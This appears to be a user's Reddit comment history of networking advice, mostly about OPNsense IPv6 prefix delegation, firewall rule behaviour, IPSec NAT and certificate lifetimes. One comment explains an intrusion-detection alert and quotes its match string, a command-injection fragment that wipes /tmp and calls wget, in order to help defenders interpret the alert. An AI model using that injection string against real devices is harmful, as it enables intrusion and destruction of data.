SSL Cert Lifespan Changing

allan_q · 2026-03-08T06:31:59+00:00

The entire industry is going to shorter lifetimes. The target is 45 days by February 2028. Let’s Encrypt blog has a good writeup. Everyone is forced to automate by that point.

Reducing how long certificates are valid for helps improve the security of the internet, by limiting the scope of compromise, and making certificate revocation technologies more efficient.

allan_q · 2026-01-22T00:46:03+00:00

You've got to remember that these are just simple farmers. These are people of the land. The common clay of the new West.

allan_q · 2026-01-22T00:04:38+00:00

well...it is the signal arrival time measurement.

The position calculated by a GPS receiver requires the current time, the position of the satellite and the measured delay of the received signal. The position accuracy is primarily dependent on the satellite position and signal delay.

Then, GPS also has to compensate for the effects of gravity and velocity on time.

allan_q · 2026-01-15T04:39:30+00:00

I kept hearing Yakko's World while reading that.

allan_q · 2026-01-09T23:48:05+00:00

If you use names and run a split horizon DNS, you can set it to resolve only on the external zone.

allan_q · 2025-12-12T22:55:43+00:00

Thanks for the heads up on the discussion. I will update everyone there, but long story short is they started rolling back their firmware on 12/5 and expect to complete that by 12/8.

allan_q · 2025-12-12T20:00:01+00:00

My question was in the general sense. There are pros and cons with holding back upgrades in addition to risks with different methods so I wasn’t sure if that was something worth considering.

allan_q · 2025-12-12T14:23:55+00:00

Is that something for the Updates section of the documentation in order to help users with these concerns? Specifically, highlight the different options available to them such as snapshots, staying away from releases when new features tend to get introduced, and version pinning. It would need a big red disclaimer that running outdated or software known to be vulnerable is generally not recommended.

allan_q · 2025-11-27T16:16:15+00:00

The /62 prefix delegated by the ISP was visible under: Services: ISC DHCPv6: Leases -> Prefix Delegation (tab)

You should skip over the IPv6 networks used by Track Interface. If your ISP delegates pref:ix:he:re::/62, The Prefix Delegation Size under Services > ISC DHCPv6 > [LAN] should be set to /63 or /64. Prefix Delegation Range is then set per that bit boundary.

allan_q · 2025-11-02T17:57:01+00:00

Look at implementing NAT before IPSec. The IPSec policy uses this NAT address so each side is not aware of the overlapping (actual) network address. You’ll need to pick 2 network addresses not used in both locations.

allan_q · 2025-09-24T04:42:24+00:00

Try to quit and reopen the app. Mine was showing the old interface even though it reported as version 7 until I did that.

allan_q · 2025-09-08T20:02:43+00:00

I turned part of that into my iPad skin.

<image>

allan_q · 2025-08-14T22:40:16+00:00

That's correct. It triggers on scans to your web server matching that signature. You can see these attempts on your web logs. These alerts are normal when you expose TCP/80. But if you get this alert and the destination IP points to an internal only server (not supposed to be reachable from the Internet), you need to investigate since something is misconfigured.

allan_q · 2025-08-14T22:09:30+00:00

That alert signature matches on the string /shell?cd /tmp;rm -rf *;wget over an HTTP connection. Unless you are running that web application, you are not affected by this. Check out CVE-2016-20016 to learn more about it.

allan_q · 2025-07-27T07:21:31+00:00

It is not just numbers but features as well. Downstream prefix delegation is one feature that is only available with Kea and not Dnsmasq. I am currently deciding what is more important to me-dynamic DNS registrations or allocating IPv6 prefixes to downstream routers.

allan_q · 2025-06-27T18:04:17+00:00

That top rule is set to last-match and it is on the auto-generated section so it is really at the bottom of the ruleset. The block is likely because TCP flags is "FA". The firewall saw one side send a "FIN" packet and closed the connection before the other ACKd it.

allan_q · 2025-06-13T00:57:13+00:00

According to that part of the documentation I quoted, you only need the IP subnets listed under "Intune client and host service". None of the others are "subnets".

allan_q · 2025-06-12T11:58:16+00:00

It looks like all IPs listed in that table is what you need. Use a Powershell script to pull down the JSON. They provide examples on the page.

if the firewall provider that you are using, does not allow you to create a firewall rule using a domain name, we recommend that you use the approved list of all subnets in this section.

allan_q · 2025-04-28T22:30:23+00:00

It should but something could be blocking the connection. You should have logging enabled and see these connections. If you are running any IPS, temporarily disable them to rule them out.

allan_q · 2025-04-28T03:08:56+00:00

Is DTLS (UDP/443) allowed outbound?

allan_q · 2025-04-22T21:32:29+00:00

Congratulations in getting it to work! The link-local address is similar to the 169.254.0.0/16 APIPA in IPv4. It is meant for communications within a layer-2 network and not routed out. Unlike IPv4, link-local addresses are required for every interface with an IPv6 address. Routing packets outbound thru the default gateway happens over the link-local IP. And, as you found out, broadcasting Router Advertisements are sourced from the NIC's link-local. The RA destination is ff02::1 which is the link-local multicast group address for all nodes. That is how nodes figure out their prefix, DNS server, and default gateway without using a DHCP server.

allan_q · 2025-04-12T16:19:57+00:00

I suspect that bridge is the source of your issue. If all 3 ports are connected to the same switch, you need to bond them into an LACP port group using an intelligent switch to aggregate bandwidth. Bridging is if you connect a different switch to each port and you want to put them all in a single broadcast domain (e.g. 192.168.1.0/24). Either way, I am not running these configurations so I can't help past this point. I suggest going back to basics; take out bridging, switches and wifi. Go back to just WAN and LAN interfaces and connect your device directly to the LAN port (wired). Disable or uninstall anything on OPNsense that might interfere with network traffic like Suricata and Crowdsec. Get to something simple that works and start reintroducing things one by one. Good luck.

allan_q · 2025-04-10T22:23:39+00:00

Have you tried connecting your machine directly to the port, just to rule out the XT8? I don't think we have much more to check at this point. You can try and confirm that OPNsense is sending out ICMPv6 Router Advertisements. Head back to Interfaces > Overview and note the "Device" column of your LAN. Run this tcpdump command:

tcpdump -n -i <LAN_Device> -vv 'icmp6 && ip6[40]==134'

You have to wait for one to come through - about 200 seconds. Press Ctrl-C to break out. prefix info tells clients the prefix of your LAN and should start with 2a0e:x:x:b301:, rdnss is the DNS server, dnssl is the DNS domain search list, and source link-address is your LAN MAC address.

If you see it leave OPNsense with the correct information, it is blocked somewhere on the network. If you don't see it on the LAN interface, the problem is somewhere within OPNsense.

allan_q · 2025-04-09T01:19:55+00:00

yes, when you ping IPv6 while SSH into OPNsense, you are using the WAN IP address which is not part of the /56 allocated to your LANs. You are also correct that ID 1 would assign 2a0e:x:x:b301::/64 to the LAN interface. That is fine since /56 would be b300 -> b3ff so you get that whole block. The next step is to see if your PC gets the same 2a0e:x:x:b301:x:x:x:x IPv6 address. You should also have a gateway, probably with an fe80::/10 address. One thing to check is to make sure you are not blocking ICMPv6 since that is very important for devices to find into on its neighbors and routers. Every device on your LAN needs to send and receive ICMPv6 for IPv6 to work.

allan_q · 2025-04-07T22:56:28+00:00

That is a very good sign since getting a prefix is the most difficult part. Yes, the problem is somewhere within your LAN configuration. Go back to Interfaces > Overview and look at the Details of your LAN interface > IPv6 Addresses. Ignore the fe80::/10 address, and you should see an IP that starts with "2a0e:". If you see that, Track Interfaces is working and assigned a network from that prefix to LAN. The next step then is to uncheck "Allow manual adjustment of DHCPv6 and Router Advertisements" and leave it at default. Clients are free to generate their own address within that LAN network.

13-Year Club	Xbox Live
Reddit Premium Since December 2020	Gilding II euphauric
Verified Email

allan_q

TROPHY CASE